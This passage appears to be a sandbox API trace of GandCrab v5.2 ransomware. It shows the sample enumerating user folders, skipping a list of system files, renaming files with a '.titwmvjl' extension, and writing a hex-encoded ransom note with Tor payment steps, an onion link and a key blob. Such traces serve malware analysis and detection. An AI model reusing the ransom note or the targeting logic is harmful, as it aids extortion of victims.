flProtect=0x4) returned 0x25d0000 [0072.489] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk.titwmvjl") returned 104 [0072.489] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 95 [0072.489] lstrlenW (lpString=".pbk") returned 4 [0072.489] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.489] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".pbk ") returned 5 [0072.489] lstrcmpiW (lpString1=".pbk", lpString2=".titwmvjl") returned -1 [0072.489] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.489] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 95 [0072.489] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 95 [0072.489] lstrcmpiW (lpString1="rasphone.pbk", lpString2="desktop.ini") returned 1 [0072.489] lstrcmpiW (lpString1="rasphone.pbk", lpString2="autorun.inf") returned 1 [0072.489] lstrcmpiW (lpString1="rasphone.pbk", lpString2="ntuser.dat") returned 1 [0072.489] lstrcmpiW (lpString1="rasphone.pbk", lpString2="iconcache.db") returned 1 [0072.489] lstrcmpiW (lpString1="rasphone.pbk", lpString2="bootsect.bak") returned 1 [0072.489] lstrcmpiW (lpString1="rasphone.pbk", lpString2="boot.ini") returned 1 [0072.489] lstrcmpiW (lpString1="rasphone.pbk", lpString2="ntuser.dat.log") returned 1 [0072.489] lstrcmpiW (lpString1="rasphone.pbk", lpString2="thumbs.db") returned -1 [0072.489] lstrcmpiW (lpString1="rasphone.pbk", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0072.489] lstrcmpiW (lpString1="rasphone.pbk", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0072.489] lstrcmpiW (lpString1="rasphone.pbk", lpString2="KRAB-DECRYPT.html") returned 1 [0072.489] lstrcmpiW (lpString1="rasphone.pbk", lpString2="CRAB-DECRYPT.html") returned 1 [0072.489] lstrcmpiW (lpString1="rasphone.pbk", lpString2="KRAB-DECRYPT.txt") returned 1 [0072.489] lstrcmpiW (lpString1="rasphone.pbk", lpString2="CRAB-DECRYPT.txt") returned 1 [0072.489] lstrcmpiW (lpString1="rasphone.pbk", lpString2="ntldr") returned 1 [0072.489] lstrcmpiW (lpString1="rasphone.pbk", lpString2="NTDETECT.COM") returned 1 [0072.489] lstrcmpiW (lpString1="rasphone.pbk", lpString2="Bootfont.bin") returned 1 [0072.489] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.490] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0072.490] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.490] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.490] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\TITWMVJL-DECRYPT.txt" [0072.490] lstrlenW (lpString=".titwmvjl") returned 9 [0072.490] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\TITWMVJL-DECRYPT.txt") returned 103 [0072.490] VirtualAlloc (lpAddress=0x0, dwSize=0x10e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.490] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 112 [0072.490] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\TITWMVJL-DECRYPT.txt") returned 103 [0072.490] lstrlenW (lpString=".txt") returned 4 [0072.490] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.490] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.490] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.490] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.491] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\TITWMVJL-DECRYPT.txt") returned 103 [0072.491] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\TITWMVJL-DECRYPT.txt") returned 103 [0072.491] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.491] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.491] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.491] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.491] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.491] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.491] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.491] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.491] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.491] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 0 [0072.491] FindClose (in: hFindFile=0x503338 | out: hFindFile=0x503338) returned 1 [0072.492] CloseHandle (hObject=0x2d4) returned 1 [0072.492] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0072.492] FindClose (in: hFindFile=0x5036f8 | out: hFindFile=0x5036f8) returned 1 [0072.493] CloseHandle (hObject=0x2cc) returned 1 [0072.493] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.493] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.493] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.493] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\TITWMVJL-DECRYPT.txt" [0072.493] lstrlenW (lpString=".titwmvjl") returned 9 [0072.493] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\TITWMVJL-DECRYPT.txt") returned 88 [0072.493] VirtualAlloc (lpAddress=0x0, dwSize=0xf0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.493] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 97 [0072.493] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\TITWMVJL-DECRYPT.txt") returned 88 [0072.493] lstrlenW (lpString=".txt") returned 4 [0072.493] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.494] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.494] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.494] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.494] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\TITWMVJL-DECRYPT.txt") returned 88 [0072.494] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\TITWMVJL-DECRYPT.txt") returned 88 [0072.494] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.494] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.494] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.494] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.494] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.494] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.494] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.494] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.494] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.494] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0072.494] FindClose (in: hFindFile=0x5037b8 | out: hFindFile=0x5037b8) returned 1 [0072.495] CloseHandle (hObject=0x2c4) returned 1 [0072.495] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.495] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.495] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.496] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\d2ca4a09d2ca4deb61a.lock" [0072.496] lstrlenW (lpString=".titwmvjl") returned 9 [0072.496] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\d2ca4a09d2ca4deb61a.lock") returned 80 [0072.496] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.496] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 89 [0072.496] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\d2ca4a09d2ca4deb61a.lock") returned 80 [0072.496] lstrlenW (lpString=".lock") returned 5 [0072.496] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.496] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.496] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.496] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.497] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.497] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.497] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.497] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\TITWMVJL-DECRYPT.txt" [0072.497] lstrlenW (lpString=".titwmvjl") returned 9 [0072.497] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\TITWMVJL-DECRYPT.txt") returned 76 [0072.497] VirtualAlloc (lpAddress=0x0, dwSize=0xd8, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.497] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 85 [0072.497] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\TITWMVJL-DECRYPT.txt") returned 76 [0072.497] lstrlenW (lpString=".txt") returned 4 [0072.497] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.497] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.497] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.497] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.497] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\TITWMVJL-DECRYPT.txt") returned 76 [0072.497] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\TITWMVJL-DECRYPT.txt") returned 76 [0072.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.498] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.498] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0072.498] FindClose (in: hFindFile=0x5033b8 | out: hFindFile=0x5033b8) returned 1 [0072.499] CloseHandle (hObject=0x2bc) returned 1 [0072.499] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0072.499] lstrcmpW (lpString1="Office", lpString2=".") returned 1 [0072.499] lstrcmpW (lpString1="Office", lpString2="..") returned 1 [0072.499] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Office" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office" [0072.499] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\" [0072.499] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.499] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.499] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.500] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.500] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.500] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.500] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.500] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.500] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.500] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.500] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.501] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\\\TITWMVJL-DECRYPT.txt") returned 76 [0072.501] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0072.502] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x